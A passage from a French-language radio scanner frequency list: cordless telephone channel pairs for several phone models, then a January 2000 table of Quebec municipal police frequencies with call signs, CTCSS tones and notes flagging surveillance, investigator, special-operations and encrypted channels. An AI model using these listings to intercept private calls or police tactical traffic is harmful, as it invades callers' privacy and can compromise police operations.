) 1.71000 49.84500 TÉLÉPHONES SANS FILS ( ANCIENS MODELES - CANAL 2A ) 1.73000 49.86000 TÉLÉPHONES SANS FILS ( ANCIENS MODELES - CANAL 3A ) 1.75000 49.87500 TÉLÉPHONES SANS FILS ( ANCIENS MODELES - CANAL 4A ) 1.77000 49.89000 TÉLÉPHONES SANS FILS ( ANCIENS MODELES - CANAL 5A ) 43.72000 48.76000 TÉLÉPHONES SANS FILS (01/25) - Modeles courants 43.74000 48.84000 TÉLÉPHONES SANS FILS (02/25) (USA/Canada). 43.82000 48.86000 TÉLÉPHONES SANS FILS (03/25) 43.84000 48.88000 TÉLÉPHONES SANS FILS (04/25) 43.92000 49.02000 TÉLÉPHONES SANS FILS (05/25) 43.96000 49.08000 TÉLÉPHONES SANS FILS (06/25) 44.12000 49.10000 TÉLÉPHONES SANS FILS (07/25) 44.16000 49.16000 TÉLÉPHONES SANS FILS (08/25) 44.18000 49.20000 TÉLÉPHONES SANS FILS (09/25) 44.20000 49.24000 TÉLÉPHONES SANS FILS (10/25) 44.32000 49.28000 TÉLÉPHONES SANS FILS (11/25) 44.36000 49.36000 TÉLÉPHONES SANS FILS (12/25) 44.40000 49.40000 TÉLÉPHONES SANS FILS (13/25) 44.46000 49.46000 TÉLÉPHONES SANS FILS (14/25) 44.48000 49.50000 TÉLÉPHONES SANS FILS (15/25) 46.61000 49.67000 TÉLÉPHONES SANS FILS (16/25) OU (01/10) 46.63000 49.84500 TÉLÉPHONES SANS FILS (17/25) OU (02/10) 46.67000 49.86000 TÉLÉPHONES SANS FILS (18/25) OU (03/10) 46.71000 49.77000 TÉLÉPHONES SANS FILS (19/25) OU (04/10) 46.73000 49.87500 TÉLÉPHONES SANS FILS (20/25) OU (05/10) 46.77000 49.83000 TÉLÉPHONES SANS FILS (21/25) OU (06/10) 46.83000 49.89000 TÉLÉPHONES SANS FILS (22/25) OU (07/10) 46.87000 49.93000 TÉLÉPHONES SANS FILS (23/25) OU (08/10) 46.93000 49.99000 TÉLÉPHONES SANS FILS (24/25) OU (09/10) 46.97000 49.97000 TÉLÉPHONES SANS FILS (25/25) OU (10/10) 30.07500 39.77500 TÉLÉPHONES SANS FILS (AUSTRALIE F 1/10) 30.10000 39.80000 TÉLÉPHONES SANS FILS (AUSTRALIE F 2/10) 30.12500 39.82500 TÉLÉPHONES SANS FILS (AUSTRALIE F 3/10) 30.15000 39.85000 TÉLÉPHONES SANS FILS (AUSTRALIE F 4/10) 30.17500 39.87500 TÉLÉPHONES SANS FILS (AUSTRALIE F 5/10) 30.20000 39.90000 TÉLÉPHONES SANS FILS (AUSTRALIE F 6/10) 30.22500 39.92500 TÉLÉPHONES SANS FILS (AUSTRALIE F 7/10) 30.25000 39.95000 TÉLÉPHONES SANS FILS (AUSTRALIE F 8/10) 30.27500 39.97500 TÉLÉPHONES SANS FILS (AUSTRALIE F 9/10) 30.30000 40.00000 TÉLÉPHONES SANS FILS (AUSTRALIE F10/10) 1.72500 40.02500 TÉLÉPHONES SANS FILS (AUSTRALIE M 1/5) 1.74000 40.07500 TÉLÉPHONES SANS FILS (AUSTRALIE M 2/5) 1.75500 40.12500 TÉLÉPHONES SANS FILS (AUSTRALIE M 3/5) 1.77000 40.17500 TÉLÉPHONES SANS FILS (AUSTRALIE M 4/5) 1.78500 40.22500 TÉLÉPHONES SANS FILS (AUSTRALIE M 5/5) 26.99500 49.86000 TÉLÉPHONES SANS FILS (PRE-1980 MONOFREQUENCE) 1.64200 47.45625 TÉLÉPHONES SANS FILS (UK CH 1) 1.66200 47.46875 TÉLÉPHONES SANS FILS (UK CH 2) 1.68200 47.48125 TÉLÉPHONES SANS FILS (UK CH 3) 1.70200 47.49375 TÉLÉPHONES SANS FILS (UK CH 4) 1.72200 47.50625 TÉLÉPHONES SANS FILS (UK CH 5) 1.74200 47.51875 TÉLÉPHONES SANS FILS (UK CH 6) 1.76200 47.53125 TÉLÉPHONES SANS FILS (UK CH 7) 1.78200 47.54375 TÉLÉPHONES SANS FILS (UK CH 8) 905.60000 925.50000 TROPEZ DX-900, CANAL 01 905.70000 925.60000 TROPEZ DX-900, CANAL 02 905.80000 925.70000 TROPEZ DX-900, CANAL 03 905.90000 927.80000 TROPEZ DX-900, CANAL 04 906.00000 925.90000 TROPEZ DX-900, CANAL 05 906.10000 926.00000 TROPEZ DX-900, CANAL 06 906.20000 926.10000 TROPEZ DX-900, CANAL 07 906.30000 926.20000 TROPEZ DX-900, CANAL 08 906.40000 926.30000 TROPEZ DX-900, CANAL 09 906.50000 926.40000 TROPEZ DX-900, CANAL 10 906.60000 926.50000 TROPEZ DX-900, CANAL 11 906.70000 926.60000 TROPEZ DX-900, CANAL 12 906.80000 926.70000 TROPEZ DX-900, CANAL 13 906.90000 926.80000 TROPEZ DX-900, CANAL 14 907.00000 926.90000 TROPEZ DX-900, CANAL 15 907.10000 927.00000 TROPEZ DX-900, CANAL 16 907.20000 927.10000 TROPEZ DX-900, CANAL 17 907.30000 927.20000 TROPEZ DX-900, CANAL 18 907.40000 927.30000 TROPEZ DX-900, CANAL 19 907.50000 927.40000 TROPEZ DX-900, CANAL 20 926.00000 902.05000 UNIDEN EXP-901, CANAL 01 926.05000 902.10000 UNIDEN EXP-901, CANAL 02 926.10000 902.15000 UNIDEN EXP-901, CANAL 03 926.15000 902.20000 UNIDEN EXP-901, CANAL 04 926.20000 902.25000 UNIDEN EXP-901, CANAL 05 926.25000 902.30000 UNIDEN EXP-901, CANAL 06 926.30000 902.35000 UNIDEN EXP-901, CANAL 07 926.35000 902.40000 UNIDEN EXP-901, CANAL 08 926.40000 902.45000 UNIDEN EXP-901, CANAL 09 926.45000 902.50000 UNIDEN EXP-901, CANAL 10 926.50000 902.55000 UNIDEN EXP-901, CANAL 11 926.55000 902.60000 UNIDEN EXP-901, CANAL 12 926.60000 902.65000 UNIDEN EXP-901, CANAL 13 926.65000 902.70000 UNIDEN EXP-901, CANAL 14 926.70000 902.75000 UNIDEN EXP-901, CANAL 15 926.75000 902.80000 UNIDEN EXP-901, CANAL 16 926.80000 902.85000 UNIDEN EXP-901, CANAL 17 926.85000 902.90000 UNIDEN EXP-901, CANAL 18 926.90000 902.95000 UNIDEN EXP-901, CANAL 19 926.95000 903.00000 UNIDEN EXP-901, CANAL 20 927.00000 903.05000 UNIDEN EXP-901, CANAL 21 927.05000 903.10000 UNIDEN EXP-901, CANAL 22 927.10000 903.15000 UNIDEN EXP-901, CANAL 23 927.15000 903.20000 UNIDEN EXP-901, CANAL 24 927.20000 903.25000 UNIDEN EXP-901, CANAL 25 927.25000 903.30000 UNIDEN EXP-901, CANAL 26 927.30000 903.35000 UNIDEN EXP-901, CANAL 27 927.35000 903.40000 UNIDEN EXP-901, CANAL 28 927.40000 903.45000 UNIDEN EXP-901, CANAL 29 927.45000 903.50000 UNIDEN EXP-901, CANAL 30 927.50000 903.55000 UNIDEN EXP-901, CANAL 31 927.55000 903.60000 UNIDEN EXP-901, CANAL 32 927.60000 903.65000 UNIDEN EXP-901, CANAL 33 927.65000 903.70000 UNIDEN EXP-901, CANAL 34 927.70000 903.75000 UNIDEN EXP-901, CANAL 35 927.75000 903.80000 UNIDEN EXP-901, CANAL 36 927.80000 903.85000 UNIDEN EXP-901, CANAL 37 927.85000 903.90000 UNIDEN EXP-901, CANAL 38 927.90000 903.95000 UNIDEN EXP-901, CANAL 39 927.95000 904.00000 UNIDEN EXP-901, CANAL 40 **************************************************************************** Fréquences de services de police municipaux 9 Janvier 2000 Fréquence Indicatif CTCSS Localité Notes et détails 154.32500 XJF 546 118.8 ACTON VALE SSI 154.67500 XJI 39 ? ALMA Avec incendies. 154.31000 XJI 39 ALMA Fréquence 2 ? - 453.47500 KNGQ 602 127.3 ALTONA (CLINTON COUNTY),NY VERIFIE DANS PERCON=ok.ANI MOBILE 154.37000 XJF 605 AMOS 411.60000 XJF 892 ARTHABASKA 411.70000 XJH 39 ASBESTOS 412.11250 XJF 531 AYLMER 154.25000 XJG 64 BAIE COMEAU 155.07000 XJG 64 BAIE COMEAU 153.89000 BAIE COMEAU DE INFO MEDAQ 159.09000 ? BAIE COMEAU DE INFO MEDAQ 159.21000 XJF 80 100.0 BEAUHARNOIS AUTRE RPT A 151.265 (PARALLELE) 151.26500 ? 100.0 BEAUHARNOIS NEW JUIL 99 EN // AVEC 159.210 RPR # 2 410.16250 XJO 845* 110.9 BEAUHARNOIS PHONE PATCH. VOIR VALLEYFIELD 159.210/151.265 **155.28000**XJF 616****156.7**BEAUPORT PLUS EN FONCTION - COUVERT PAR LA VILLE DE QUÉBEC **155.61000**XJF 616****156.7**BEAUPORT PLUS EN FONCTION - COUVERT PAR LA VILLE DE QUÉBEC 154.04000 XJF 894 BEAUPRE 151.19000 XJG 467 ? BECANCOUR A REVOIR 153.95000 XJF 719 100.0 BEDFORD 410.23750 XJF 719? 114.8 BEDFORD NOUVEAU 97. 411.48750 XJF 47 123.0 BELOEIL 155.58000 KLL 714 BENNINGTON .VT LOCAL POLICE 155.52000 ? BENNINGTON.VERMONT 411.67500 XJG 48 BERTHIERVILLE 410.08750 XLP 792 BISHOPTON 154.17500 XJK 26 BLACK LAKE 412.96250 XJH 224 123.0 BLAINVILLE 411.88750 ? 141.3 BOIS DES FILION AVEC TERREBONNE. 410.28750 XJF 725 141.3 BOISBRIAND 410.16250 XJF 552 123.0 BOUCHERVILLE 154.40000 ? BRADFORD, VERMONT 154.01000 XJF 212 100.0 BROMONT ROLLING CODE A L'OCCASION 154.04000 XJF 729 BROMPTONVILLE 412.01250 XJF 498 100.0 BROSSARD 413.01250 XJF 498 100.0 BROSSARD 154.92000 XJF 791 BROWNSBURG 155.73000 ? ? CANAL 2 DE INFO MEDAQ. 413.38750 XJG 425 156.7 CANDIAC 412.56250 XJG 425 156.7 CANDIAC CANDIAC, DELSON, ST CONSTANT 411.03750 VDE 238 CANDIAC CENTRE 9-1-1. 90 RUE MONTCALM. 154.84500 XJF 75 CAP DE LA MADELEINE 155.43000 XJF 75 CAP DE LA MADELEINE 410.23750 VBN 896 100.0 CARIGNAN 411.63750 XJF 746 114.8 CHAMBLY 151.29500 XJF 852 CHAPAIS 411.63750 XJI 270 123.0 CHARLEMAGNE ENCODAGE SSI. CHARLEMAGNE/LEGARDEUR 411.38750 XJG 489 CHARLESBOURG ENQUETEURS - BROUILLAGE NUMERIQUE 412.11250 XJG 489 162.2 CHARLESBOURG F-1 (F-2 = 408.0375) 408.03750 XJG 489 162.2 CHARLESBOURG F-2 (F-1 = 412.1125) 411.11250 XJN 248 167.9 CHATEAUGUAY 411.63750 XJF 912 100.0 CHAUDIÈRE-ETCHEMIN BROUILLEUR NON-PERMANENT (INFO- 410.36250 ? 100.0? CHAUDIÈRE-ETCHEMIN CANAL 2 BROUILLEUR NON PERMANENT.INFO-MEDAQ. 154.31000 XJF 613 CHIBOUGAMAU 410.40000 XJN 283 CHICOUTIMI 154.65000 XJF 590 COATICOOK BROUILLEUR 411.58750 XJO 883 71.9 CONTRECOEUR POLICE DE STE JULIE 142.03500 ? 162.2 CORNWALL, ON RECU EN INVERSIONS (DE TEMPÉRATURE) 154.01000 XJF 212 100.0 COWANSVILLE ROLLING CODE A L'OCCASION 154.16000 XJG 461 100.0 CRABTREE POSTE DE POLICE DE JOLIETTE 413.31250 XJF 448 100.0 DELSON 412.56250 XJG 425 156.7 DELSON CANDIAC, DELSON, ST CONSTANT 411.68750 XJF 448 123.0 DELSON PP 412.91250 XJI 59*** 131.8 DEUX MONTAGNES PASSE SUR EDACS 866 MHZ 867.31250 XJI 59? TRK DEUX MONTAGNES TRUNKING EDACS, POLICE RÉGIONALE. 866.81250 XJI 59? TRK DEUX MONTAGNES TRUNKING EDACS. POLICE RÉGIONALE. 866.31250 XJI 59? TRK DEUX MONTAGNES TRUNKING EDACS. POLICE REGIONALE. 154.37000 XJF 326 DOLBEAU 158.97000 XJF 456 DONNACONA 411.15000 XJI 24 107.2 DRUMMONDVILLE 413.31250 XJI 24 107.2 DRUMMONDVILLE 412.86250 XJI 24 107.2 DRUMMONDVILLE DATA TIM SANS CTCSS. VOIX AVEC CTCSS 412.33750 XJF 608 DRUMMONDVILLE PROTECTION PUBLIQUE 158.97000 XJF 328 EAST ANGUS CONFIRME A.LAF. 23-10-99. 411.70000 XJF 572 114.8 FARNHAM ENCODAGE SSI 153.95000 XJL 602 FERMONT 154.69500 KUZ 980 FINENEW YORK 158.97000 XJF 888 FORESTVILLE 154.02500 XLP 743 GASPE 154.02500 XLP 744 GASPE 154.02500 XLP 745 GASPE 154.04000 XJF 95 110.9 GATINEAU 154.57000 XJF 940 110.9 GATINEAU 154.98000 XJF 95 110.9 GATINEAU 154.98000 XJF 940 110.9 GATINEAU 154.98000 XJI 250 110.9 GATINEAU 154.25000 XJN 588 110.9 GRANBY 155.16000 XJF 68 110.9 GRANBY 155.50500 XJF 68 110.9 GRANBY 154.25000 XJF 68 110.9 GRANBY SSI (VSB) ET NORMAL 411.57500 VOR 713* 114.8 GRANBY (CANTONS DE) ENCODAGE SSI. REVOIR INDICATIF 153.95000 XJN 590 110.9 GRAND MERE 154.35500 GRAND MERE DATA.A REVOIR 159.21000 XJF 80 100.0 GRANDE ILE AUTRE RPT A 151.265 (PARALLELE) 151.26500 ? 100.0 GRANDE ILE NEW JUIL 99 EN // AVEC 159.210 RPT # 2 412.78750 XJG 38 123.0 GREENFIELD PARK 412.88750 XJI 94 173.8 GREENFIELD PARK 411.65000 XJF 297 HUDSON 411.61250 XJF 297 107.2 HUDSON MAJ 311296 412.01250 XJI 46 HULL 412.33750 XJK 214 110.9 HULL 412.98750 XJK 214 110.9 HULL 413.03750 ? 110.9 HULL 411.66250 XJI 211 HUNTINGDON 154.77000 XJK 43 IBERVILLE 412.11250 XJK 43 100.0 IBERVILLE 154.16000 XJG 461 100.0 JOLIETTE ACI RX (800 HZ) 410.10000 XJN 280 JONQUIERE 410.90000 XJL 658 JONQUIERE 411.98750 ? 123.0 KAHNAWAKE PEACE KEEPER 154.01000 XJN 514 KIPAWA 151.14500 XJF 787 114.8 L'ANCIENNE LORETTE OPERATIONS. AVEC INCENDIES. 412.56250 XJF 284 114.8 L'ASSOMPTION ENCODAGE SSI 410.01250 ? LA BAIE 411.66250 ? 94.8 LA PLAINE SSI. 154.13000 XJF 749 LA POCATIERE 412.21250 XJG 90 123.0 LA PRAIRIE RPT VOIX AVEC PL/DATA SANS PL. 154.31000 XJF 792 LA SARRE 411.60000 XJG 495 LA TUQUE 151.53500 XJN 205 LAC BEAUPORT INCENDIES ? 410.93750 XJF 829 118.8 LAC BROME (KNOWLTON) ENCODAGE SSI 411.60000 XJF 717 LAC MEGANTIC 411.01250 XJK 952 141.3 LACHENAIE ENCODAGE SSI PERMANENT. 154.40000 XJH 28 LACHUTE 411.98750 XJH 28 LACHUTE 169.68000 ? 100.0 LAURENTIDES / ST LIN ENCODAGE SSI A L'OCCASION 173.79000 MOBILES> 100.0 LAURENTIDES / ST-LIN ENTREE REPETEUR DE 169.680 412.38750 ? 156.7 LAUZON 143.02500 XJF 586 103.5 LAVAL 143.02500 XJK 912 103.5 LAVAL 143.29500 XJF 586 103.5 LAVAL 143.29500 XJK 912 103.5 LAVAL 143.41500 XJF 586 103.5 LAVAL 143.41500 XJK 912 103.5 LAVAL 143.59500 XJF 586 103.5 LAVAL 143.59500 XJK 912 103.5 LAVAL 143.92500 XJF 586 103.5 LAVAL 143.92500 XJK 912 103.5 LAVAL 151.35500 XJF 586 103.5 LAVAL SIMPLEX ENQUETES 151.23500 XJF 586 103.5 LAVAL SIMPLEX ENQUETEURS 410.68750 ? LE GARDEUR 411.63750 XJF 577 123.0 LE GARDEUR ENCODAGE SSI + TIM (o PL) CHARLEMAGNE/LEGARDEUR 154.37000 XJF 797 LEBEL SUR QUEVILLON 411.62500 XJF 617 LENNOXVILLE 412.56250 XJO 802 LENNOXVILLE 411.60000 XJG 451 123.0 LERY 114.8 hz? 412.98750 ? 156.7 LEVIS CANAL 1 (AVEC INCENDIES) BROUILLNONPERM. 412.38750 ? LEVIS CANAL 2 (AVEC INCENDIES) BROUILLNON PERM 413.51250 ? 156.7 LEVIS CANAL 3 AVEC INCENDIES 412.06250 XJG 55 110.9 LONGUEUIL F 01 - GENERAL (RCC C.H.P.B.). 412.38750 XJG 55 110.9 LONGUEUIL F 02 - DEGAGEMENT. 412.98750 XJG 55 110.9 LONGUEUIL F 03 - INFORMATIONS (CRPQ) 412.58750 XJG 55 110.9 LONGUEUIL F 04 - NUMERIQUE GENRE SQ A L'OCCASION. 412.96250 XJG 429 136.5 LORETTEVILLE 413.48750 XJG 429 LORETTEVILLE 410.53750 XJF 754 118.8 LORRAINE 453.47500 KNHM 983 110.9 LYON MOUNTAIN (CLINTON CTY) NY LINK ? 154.69500 WRG 846 LYON MOUNTAIN, NY 410.31250 ? 100.0 MAGOG 453.40000 ??? 542 123.0 MALONE, NEW YORK 155.01000 XJK 932 MANIWAKI 411.66250 XJF 783 100.0 MARIEVILLE 413.38750 ? 136.5 MASCOUCHE 411.98750 ? 136.5 MASCOUCHE OK 154.04000 XJF 460 MASSON-ANGERS 155.61000 XJF 555 MATANE 155.79000 XJF 555 MATANE 159.21000 XJF 80 100.0 MELOCHEVILLE AUTRE RPT A 151.265 (PARALLELE) 151.26500 ? 100.0 MELOCHEVILLE NEW JUIL 99 EN // AVEC 159.210 RPT # 2 411.63750 XJO 841 167.9 MERCIER ENCODAGE SSI 412.86250 ? 167.9 MIRABEL POLICE INTERMUNICIPALE. LIEN AVEC 411.5875 ? 411.58750 XJF 576 123.0 MIRABEL XJN575 ? VOIR AUSSI 412.8625 (NOUVEAU) 159.21000 XJF 313 MONT JOLI 153.80000 XJG 428 MONT LAURIER 151.29500 XJF 895 MONT ROLAND ST DONAT 411.56250 XJG 324 100.0 MONT ST HILAIRE **158.97000 XJF 387********** MONTMAGNY PLUS EN FONCTION - VOIR UHF 410.11250 XJF 387 ? MONTMAGNY OK 410.48750 XJN 335 203.5 MONTREAL 408.03750 XJN 341 203.5 MONTREAL 408.16250 XJN 341 203.5 MONTREAL 408.21250 XJN 335 203.5 MONTREAL 408.26250 XJN 341 203.5 MONTREAL 408.43750 XJK 980 203.5 MONTREAL 408.43750 XJN 335 203.5 MONTREAL 408.53750 XJN 335 MONTREAL 408.61250 XJN 341 MONTREAL 408.66250 XJN 341 MONTREAL 410.11250 XJN 335 203.5 MONTREAL 410.26250 XJN 335 203.5 MONTREAL 410.36250 XJN 335 203.5 MONTREAL 410.58750 XJN 335 203.5 MONTREAL 410.61250 XJN 335 203.5 MONTREAL 410.78750 XJN 335 203.5 MONTREAL 410.91250 XJN 335 203.5 MONTREAL 410.96250 XJN 335 203.5 MONTREAL 411.18750 XJN 335 203.5 MONTREAL 411.37500 XJN 335 203.5 MONTREAL 411.53750 XJN 335 203.5 MONTREAL 412.13750 XJN 335 203.5 MONTREAL 413.23750 XJK 970 203.5 MONTREAL 413.23750 XJN 335 203.5 MONTREAL 413.53750 XJN 335 203.5 MONTREAL 413.61250 XJN 335 203.5 MONTREAL 413.73750 XJN 335 203.5 MONTREAL 413.78750 XJN 335 203.5 MONTREAL 415.66250 XJN 335 203.5 MONTREAL 418.21250 XJN 335 MONTREAL 418.38750 XJN 335 203.5 MONTREAL 418.73750 XJN 335 MONTREAL 418.86250 XJK 274 MONTREAL 410.66250 XJN 335 203.5 MONTREAL 1- 8 : SIMPLEX (ENQUETES,SUIVI,ETC) 408.41250 XJN 335 203.5 MONTREAL ACI RX (1225 HZ) 408.51250 XJN 335 203.5 MONTREAL ACI RX, SURVEILLANCE UNITES 91 412.68750 XJN 335 203.5 MONTREAL CANAL 09 - OPS SPECIALES 411.31250 XJN 335 203.5 MONTREAL CANAL 10 - OPS SPECIALE 418.23750 XJN 335 MONTREAL CANAL 4 - 7 NUMÉRIQUE 413.76250 XJN 335 203.5 MONTREAL CANAL ? (APPELE LE V.V.M.) 413.66250 XJN 335 203.5 MONTREAL CTCSS SI PAS NUMERIQUE CANAL TACTIQUE (AUTOS 72-X) 408.31250 XJN 335 203.5 MONTREAL CTCSS SUR ANALOGUE SINON DVP 418.11250 XJN 335 203.5 MONTREAL DVP UTILISE ET ANALOGUE RARE 413.18750 XJN 335 203.5 MONTREAL DVP=0 PL. 203=ANALOGUE 413.11250 XJN 335 203.5 MONTREAL DVP=O PL. 203 = ANALOGUE 408.11250 XJN 335 203.5 MONTREAL ENCODAGE DVP UTILISE SOUVENT 418.46250 XJN 335 203.5 MONTREAL PL SI PAS EN DVP 410.91250 XJK 968 MONTREAL POSTE ? CW ID RX 410.36250 XJK 968 ----- MONTREAL POSTE. CW ID RX (1300 HZ) 410.26250 XJN 341 203.5 MONTREAL POSTES 418.78750 XJN 335 MONTREAL SURVEILLANCE 418.18750 XJN 341 MONTREAL SURVEILLANCE PHYSIQUE (DVP) 408.63750 XJN 335 203.5 MONTREAL V.A. VOLES (VVM) / HELICO RX 411.46250 ? DVP MONTREAL SQ ? RPT NUMERIQUE ASSEZ ANCIEN. ENTENDU AUSSI A QUÉBEC 411.51250 ? DVP MONTREAL SQ ? RPT NUMERIQUE ASSEZ ANCIEN. ENTENDU AUSSI À QUÉBEC 410.51250 ? DVO MONTREAL SQ ? RPT NUMERIQUE ASSEZ ANCIEN. 412.68750 XJK 980 MONTREAL (MONTAGNE) CANAL 09 - RPT G.E. 411.31250 XJK 980 MONTREAL (MONTAGNE) CANAL 10 - RPT G.E. 410.36250 XJN 486 MONTREAL (MONTAGNE) REPETEUR 410.26250 XJN 486 MONTREAL (MONTAGNE) REPETEUR (ACI RX : 1200 HZ) 410.61250 XJN 486 MONTREAL (MONTAGNE) REPETEUR (ACI RX : 1500 HZ) 410.91250 XJN 486 MONTREAL (MONTAGNE) REPETEUR (RX AUSSI XJK 968) 410.11250 XJK 980 MONTREAL (MONTAGNE) RPT G.E. 410.48750 XJK 980 MONTREAL (MONTAGNE) RPT G.E. 410.58750 XJK 980 MONTREAL (MONTAGNE) RPT G.E. 410.78750 XJK 980 MONTREAL (MONTAGNE) RPT G.E. 410.96250 XJK 980 MONTREAL (MONTAGNE) RPT G.E. 411.37500 XJK 980 MONTREAL (MONTAGNE) RPT G.E. 411.53750 XJK 980 MONTREAL (MONTAGNE) RPT G.E. 412.13750 XJK 980 MONTREAL (MONTAGNE) RPT G.E. 410.61250 XJK 969 MONTREAL (MONTAGNE) RPT G.E. - MT ROYAL. 410.81250 XJK 980 MONTREAL (MONTAGNE) RPT G.E. - T.I.M.3 (DATA) 410.03750 XJK 980 MONTREAL (MONTAGNE) RPT G.E. - TIM 1,CW ID RX 410.33750 XJK 980 MONTREAL (MONTAGNE) RPT G.E. - TIM 2 ACIRX 411.21250 XJK 980 MONTREAL (MONTAGNE) RPT G.E. - TIM 4 (DATA) 155.76000 XJF 807 MT ADSTOCK RPT MT ADSTOCK. 411.63750 ? NEW GLASGOW 154.69500 WXM 690 NEW YORK STATE 154.69500 KQI 740 NEW YORK STATE. 411.65000 XJG 375 103.5 NICOLET 413.70000 XJG 375 NICOLET 155.64500 ? NORTH CONWAY NY 411.57500 XJL 606 107.2 NOTRE DAME DE L'ILE PERROT 411.68750 XJL 606 151.4 NOTRE DAME DE L'ILE PERROT 154.16000 XJG 461 100.0 NOTRE DAME DE LOURDES POSTE DE POLICE DE JOLIETTE 154.16000 XJG 461 100.0 NOTRE DAME DES PRAIRIES POSTE DE POLICE DE JOLIETTE 154.17500 ? ODANAK 140.11500 XJF 27 151.4 OTTAWA 142.48500 XJF 27 151.4 OTTAWA 142.72500 XJF 27 151.4 OTTAWA 142.80000 (ONTARIO) ? OTTAWA 139.92000 XJF 27 151.4 OTTAWA REÇU EN INVERSIONS (de température) 141.09000 XJF 27 151.4 OTTAWA RECOIT EN INVERSIONS, BONS SIGNAUX 142.09500 XJF 27 151.4 OTTAWA RECU EN INVERSIONS (DE TEMPÉRATURE) 142.23000 XJF 27 151.4 OTTAWA RECU EN INVERSIONS (DE TEMPÉRATURE) 411.68750 XJF 886 100.0 OTTERBURN PARK 411.03750 XJF 886 100.0 OTTERBURN PARK DATA TIM SANS CTCSS. VOIX AVEC CTCSS. 154.83000 CFD 693 100.0 PIEDMONT NOUVEAU JAN 1997. 3 MUNICIPALITES.ANI 154.05500 XJF 885 PIERREVILLE 411.68750 XJF 545 151.4 PINCOURT 410.58750 ? 94.8 PLESSISVILLE 154.01000 XJK 283 POINTE BLEUE 410.53750 XJP 743 77.0 POINTE CALUMET 861 BL CHAPELLE 154.37000 XJF 602 PORT CARTIER 154.37000 XJF 602 PORT CARTIER 155.79000 VBQ 792 PORT DE QUEBEC 271 DE L'ESTUAIRE 154.83000 CFD 693 100.0 PREVOST NOUVEAU JAN 1997. 3 MUNICIPALITES.ANI 411.56250 XJF 847 PRINCEVILLE 141.39000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 1A 141.19500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 1B.RECOIT SOUVENT EN INVERSIONS 141.30000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 1C 141.43500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 2A 141.69000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 2B 143.65500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 2C 141.63000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 3A 141.40500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 3B 141.70500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 4A 141.49500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 4B 141.36000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 5A 141.72000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 5B 141.45000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 6A 141.54000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 6B 141.55500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 7A 141.67500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 7B 142.36500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 8A 142.66500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 8B 143.10000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 8C 143.19000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 9A 143.64000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 9B 142.83000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 9C 142.77000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP COMMON CHANNEL. 140.97000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP SIMPLEX CHANNEL 153.80000 XJL 673 QUEBEC 153.83000 XJK 901 QUEBEC 154.10000 XJK 901 QUEBEC 154.10000 XJF 96 QUEBEC 154.19000 XJK 901 QUEBEC 154.71000 XJF 96 QUEBEC 154.71000 XJK 299 123.0 QUEBEC 154.77000 XJF 96 QUEBEC 154.77000 XJK 900 QUEBEC 155.40000 XJF 96 QUEBEC 155.40000 XJK 900 QUEBEC 155.85000 QUEBEC 155.88000 XJK 900 QUEBEC 155.88000 XJK 901 QUEBEC 158.80000 XJF 96 QUEBEC 154.19000 XJF 96 QUEBEC ANTI-EMEUTE SEULEMEMENT 155.13000 XJK 299 QUEBEC ANTI-EMEUTE SEULEMENT. 155.79000 QUEBEC BANDE 1. 155.79000 XJF 96 123.0 QUEBEC F-1 OPERATIONS GENERALES 155.85000 XJF 96 QUEBEC F-2. 155.58000 XJF 96 QUEBEC F-3. 411.16250 XJF 96 123.0 QUEBEC LIEN COMPLEXE G ? RX SUR PLACE OU INTERMOD ? 153.80000 XJK 902 QUEBEC (ILE D'ORLEANS) 153.98000 XJK 902 QUEBEC (ILE D'ORLEANS) 154.10000 XJK 902 QUEBEC (ILE D'ORLEANS) 154.19000 XJK 902 QUEBEC (ILE D'ORLEANS) 155.79000 XJK 902 123.0 QUEBEC (ILE D'ORLEANS) 155.85000 XJK 902 QUEBEC (ILE D'ORLEANS) 413.31250 XJF 588 151.4 REPENTIGNY 413.51250 XJF 588 151.4 REPENTIGNY 412.91250 XJF 588 151.4 REPENTIGNY ACI RX. AUSSI TIM A 0 CTCSS 412.66250 ? REPENTIGNY DATA, TERMINAUX MOBILES. 411.58750 ? 136.5 RICHELIEU 411.63750 XJF 576 123.0 RIGAUD 153.77000 XJF 321 RIMOUSKI 154.68000 XJF 321 RIMOUSKI 155.43000 XJF 321 RIMOUSKI 153.87500 ? RIMOUSKI DE INFO MEDAQ. FREQUENCE ETRANGE ? 159.33000 XJI 252 RIVIERE AU RENARD 153.95000 XJF 260 RIVIERE DU LOUP 411.52500 XJF 544 ROBERVAL 418.27500 XJF 544 ROBERVAL 159.21000 ? ROCHESTER NY INTERSERVICE 411.65000 XJI 278 ROCK FOREST 412.56250 XJI 278 ROCK FOREST 154.68000 XJH 222 ROCK ISLAND 412.78750 XJJ 34 127.3 ROSEMERE 154.04000 XJH 53 ROUYN-NORANDA F1-DATA BURSTS/TONE AIGU/DVP SUR DEMANDE 154.92000 XJH 53 ROUYN-NORANDA F2 - CRPQ 159.27000 XJF 361 SCHEFFERVILLE 154.10000 XJK 28 SEPT ILES 154.71000 XJK 28 SEPT ILES 158.97000 ? SHAWINIGAN 411.85000 ? 162.2 SHAWINIGAN SUD 413.10000 ? SHAWINIGAN SUD 411.85000 ? SHAWINIGAN SUD TIM 855.58750 XJF 44 